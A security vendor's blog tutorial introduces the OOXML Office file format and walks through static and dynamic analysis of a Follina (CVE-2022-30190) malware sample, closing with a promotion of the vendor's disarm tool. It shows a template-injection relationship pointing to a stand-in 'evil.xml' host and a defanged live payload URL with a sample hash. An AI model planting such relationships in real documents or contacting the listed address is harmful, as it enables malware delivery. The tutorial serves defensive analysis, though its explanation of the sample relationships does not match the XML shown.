Close

Request Demo

BUFFERZONE is available to Enterprise companies only. Please fill out the form below and we’ll contact you shortly


    Blog

    Back

    The Beginner’s Guide To – OOXML Malware Reverse Engineering Part 1

    By BUFFERZONE Team, 24/08/2023

    Target: Cybersecurity specialist

    Tags: OOXML, Word, PowerPoint, Excell, Malware, Content Disarm and Reconstruction (CDR), Reverse Engineering, Zero-Trust.

    Microsoft Office Open XML (OOXML) used from the 2007 version of Office documents onward. OOXML is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word-processing documents. The file format is used by extensions xlsx, docx, pptx, and other variants [2]. It is the successor to the Object Linking and Embedding (OLE) file format (Blog), which employs compound files instead of XML files to store content. Both OOXML and OLE files are interchangeable and can be saved as one another. The ECMA International standardized the initial version as ECMA-376. ISO and IEC standardized later versions as ISO/IEC 29500 [1].

    Hackers exploit Microsoft OOXML for several reasons:

    • It is widely used by Microsoft Office, the most popular office suite in the world, and OOXML is the default file format for Microsoft Office 2007 and later versions (including Office 365). This means that many people use OOXML files, making them a target for hackers.
    • OOXML is a complex file format, which makes it difficult to secure. There are many diverse ways to exploit OOXML files, and it can be difficult for security researchers to keep up with all the new vulnerabilities discovered. Known vulnerabilities are modified and used in the wild for a long time.
    • OOXML is an open standard that is freely available to anyone. This makes it easier for hackers to find and exploit vulnerabilities in OOXML files.

    OOXML File-Format

    The file is a ZIP archive containing XML files organized into a package, and the data type of each part is specified in a manifest file called [Content_Types].xml which is a critical part of the OOXML file format and used by applications to read and write OOXML files.

    It lists all the parts in the file and their relationships.

    • Rels: The .rels section in an OOXML file is a manifest file that lists the relationships between the parts of the file. Each relationship specifies the source part, the target part, and the type of relationship. The .rels section is typically located in the _rels folder of the OOXML file.
    <?xml version=”1.0″ encoding=”utf-8″ standalone=”yes”?><Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument” Target=”word/document.xml” /><Relationship Id=”rId2″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties” Target=”docProps/app.xml” /><Relationship Id=”rId3″
    • The first relationship (rId1) specifies that the source part (word/document.xml) contains the target part (office Document).
    • The second relationship (rId2) specifies that the source part (word/document.xml) references the target part (theme/theme1.xml).
    • The third relationship (rId3) specifies that the source part (word/document.xml) references the target part (styles.xml).

    The .rels section is a critical part of the OOXML file format. It allows applications to read and write OOXML files by providing information about the relationships between the parts of the file.

    • docprops: the section in a Microsoft OOXML file is a container for document properties. Document properties are metadata about the document, such as the author, the title, the creation date, and the modification date.

    The docprops section is typically located in the docprops folder of the OOXML file. The docProps folder is a hidden folder containing additional files used by the               OOXML file format.

    The core.xml that is found in the docprops includes information about the document author:

    • Author: The name of the author of the document.
    • Title: The title of the document.
    • Subject: The subject of the document.
    • Keywords: A list of keywords that describe the document.
    • Creation date: The date and time that the document was created.
    • Last modification date: The date and time that the document was last modified.
    • Company: The name of the company that created the document.
    • Manager: The name of the manager who approved the document.
    • Comments: Any comments about the document.
    • Template: The name of the template that was used to create the document.
    • CustomXML : The CustomXML  section in a Microsoft OOXML file is a container for custom XML parts. Custom XML parts are XML documents that can be stored in an OOXML file. They can be used to store arbitrary data, such as custom properties, user-defined tags, or even entire documents.

    The CustomXML contains:

    • The CustomXML Part element specifies the ID, name, and content of the custom XML part.
    • The Id attribute specifies the unique identifier of the custom XML part.
    • The Name attribute specifies the name of the custom XML part.
    • The content element specifies the content of the custom XML part.

    The CustomXML can store:

    • Custom properties: Custom properties can be used to store arbitrary data about a document.
    • User-defined tags: User-defined tags can be used to add custom formatting to a document.
    • Entire documents: Entire documents can be stored in a CustomXML section, this enables storing templates or other documents that are referenced by the main document.
    • Word: The word section in a Microsoft OOXML file is used to store the main content of the document. It contains the text, formatting, and other elements that make up the document. The word section is typically located in the word folder of the OOXML file. The word folder is a subfolder of the root folder.
      The word section is a critical part of the OOXML file format. It contains the document’s main content, which makes the document readable.

    The Word section contains:

    • Text: The text element is used to store the actual text of the document.
    • Formatting: The pPr element stores the formatting of the text, such as the font, size, and color.
    • Styles: The pStyle attribute is used to store the style of the paragraph.
    • Objects: Objects like images and tables can also be stored in a word section.

    Attacking The Format

    Microsoft Office files are common attack vectors for spreading malware, with a continuous but slow increase in OOXML-based malware since 2015. There are several methods employed by malicious actors to exploit OOXML files:

    ·       RELS: Template injection: By adding a new relationship to the rels file, we open new attack possibilities, for example, the following:

    <Relationship Id=”rId3″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml” Target=”customXml.xml”> <TargetMode>External</TargetMode> <TargetURI>http://example.com/evil.xml</TargetURI> </Relationship>
    The target can be a remote URI or a local file.

    • VBA Macros: Like OLE malware attacks that used Lure images to convince users to enable macros.
    • Embedding of OLE Objects: OOXML allows the embedding of OLE (Object Linking and Embedding) objects within an OOXML file. These OLE objects are created with programs supporting Microsoft’s OLE technology, such as Microsoft Word. Malicious actors can exploit vulnerabilities in OLE objects. For example, the OOXML file format permits the embedding of OLE objects, which can be manipulated by hackers to execute remote code.
    • General XML Vulnerabilities: While not specific to OOXML, XML vulnerabilities can potentially impact OOXML files since they are XML-based. An example of this is XML External Entity (XXE) attacks, where a weakly configured XML parser can be exploited to lead to various system impacts, such as the disclosure of confidential data, denial of service, server-side request forgery, and more. XXE attacks can involve external resource inclusion style attacks, which can disclose local files containing sensitive information or enable CSRF attacks on unprotected internal services [5].

    Malware Investigation Research Steps:

    Investigating OOXML malware requires a careful and systematic approach. Below are highly suggested steps we conduct in our research:

    1. Isolation: Always work in a safe environment when dealing with potential malware. This usually means using a sandbox or a dedicated, isolated system that is not connected to your network. In this blog, we will work inside Ubuntu Virtual Machine.
    2. Collection: The first step is gathering potentially malicious OOXML files. These can be sourced from various locations like spam emails, and suspicious websites, or shared through threat intelligence feeds. We will use MalwareBazaar [6], a public malware repository, to receive interesting malware for analysis.
    3. Static Analysis: Start by examining the OOXML without executing it. This includes viewing the file metadata, the structure, the embedded objects, scripts, or unusual elements. In this blog, we will use the OleTools suite [7], and we will use OleVBA and OleObj, Yara static engine signature [8], malware signatures from ditekshen detection Yara signatures [9].
    4. Dynamic Analysis: This involves monitoring the behavior of the OOXML file when it is opened. You would typically use a sandbox environment for this, which can safely log the actions of the file, such as network connections, file system modifications, or registry changes. Many evasive behaviors are discovered during dynamic analysis that can highlight behavior that we missed during the static analysis or are unfamiliar with. This part will be outside of this blog’s focus.
    5. Payload Extraction: If the OOXML has an embedded payload, this will need to be extracted for further analysis. This could be another file, a script, or something else. Payload extraction can be done as part of the static analysis or part of the dynamic analysis features.
    6. Code Analysis: If the OOXML includes embedded or obfuscated code, such as OLE objects or PowerShell, this must be analyzed. This involves de-obfuscating the code, understanding its functionality, and identifying any potential exploits or vulnerabilities it might use. This will be done as part of our static analysis investigation.
    7. Threat Intelligence Correlation: Correlate the information collected about the OLE malware with threat intelligence data. This can give information on the possible threat actors, campaigns, their methods, or whether this malware has been observed before. This step is done after the collection and during the static and dynamic analysis. When we discover Information of Compromise (IOC), a list of drop file (sha256 /MD5 hash representation), URLs, and IP addresses in the file, we can enhance our understanding of the file capabilities based on threat intelligence.
    8. Reporting: Finally, document your findings. This report should detail the characteristics of the malware, how it works, its impact, and recommended mitigation strategies.

    Remember to stay safe when investigating potential malware, and only do so in a controlled and isolated environment. It is essential to keep systems and software up to date to protect against known vulnerabilities that malware often exploits. This tutorial is for educational purposes only. Please take full responsibility while handling dangerous malicious files.

    OOXML Research

    In this blog, we will investigate sha256:  812f20d2efdf9807d425cb63ea737d4bbc4774af375dbc6d3164b913c450b1be

    Threat Intelligence:

    The first stage will be reviewing the file in VirusTotal to get reputation and information about the file. We can observe that the file is related to Follina CVE-2022-30190, a vulnerability in Microsoft Support Diagnostic Tool (MSDT). The adversaries behind this exploit hosted the Follina exploit in an external public-facing URL. This URL was injected into the document with an exploit marker “!” at the end of the URL to trigger the exploit template. Although the exploit is from 2022, the detection rate, as we can observe in VirusTotal, is relatively low, 40/65.

    Dynamic Analysis:

    From viewing the file in an OPSWAT FileScan.IO emulation sandbox environment (Link ), we can observe that winword.exe opened Iexplorer.exe and downloaded: http://45[.]67[.]229[.]164:[7497]/payload.html

    This is evidence of malicious activity since the file downloads an “HTML” file and uses a fixed IP address instead of a defined domain. This is abnormal behavior usually exhibited by malware authors.

    Now let’s review it from the static analysis point of view.

    Static Analysis:

    To begin our analysis, we will use a script called Oleid, which is part of the OleTools library. We can observe that Oleid detected External Relationships.

    It is also interesting to see the document’s structure after unzipping since the location of Rel’s section is inside the Word section and not in the first hierarchy, but this behavior is allowed in OOXML.

    From OleId, we can understand that there are no VBA or XLM macros. We verified this is the case by calling olevba <file>:

    By running OleObj, we can observe it detected an external relation with the IP we saw in the dynamic analysis.

    Content Disarm, and Reconstruction (CDR) technology is a great solution to counter this. CDR removes any suspicious attack vectors, whether they are malicious or not.

    After using BUFFERZONE SafeBridge™ CDR technology, we observed that the solution safely removed the exploit. This is the output from the OleId results showing that the external relationships are now secure:

    Our next blog post will continue to delve into the OOXML file format attacks, present new attack vectors, and how we can remediate them.

     

    References

    [1] ISO/IEC 29500-1:2016, Information technology — Document description and processing languages — Office Open XML File Formats — Part 1: Fundamentals and Markup Language Reference, https://www.iso.org/standard/71691.html

    [2] Open XML Formats and file name extensions, https://support.microsoft.com/en-us/office/open-xml-formats-and-file-name-extensions-5200d93c-3449-4380-8e11-31ef14555b18

    [3] Ionut Ilascu, New Technique Recycles Exploit Chain to Keep Antivirus Silent, https://www.bleepingcomputer.com/news/security/new-technique-recycles-exploit-chain-to-keep-antivirus-silent/

    [4] Template Injection, https://attack.mitre.org/techniques/T1221/

    [5] OWSAP, XML External Entity (XXE) Processing, https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

    [6] MalwareBazaar, Public malware repository, https://bazaar.abuse.ch/

    [7] ] OleTools, https://github.com/decalage2/oletools

    [8] Yara, the pattern-matching Swiss knife for malware researchers, https://virustotal.github.io/yara/

    [9] Ditekshen, Yara signatures, https://github.com/ditekshen/detection.

    [10] Sergiu Gatlan, Microsoft patches actively exploited Follina Windows zero-day,  https://www.bleepingcomputer.com/news/security/microsoft-patches-actively-exploited-follina-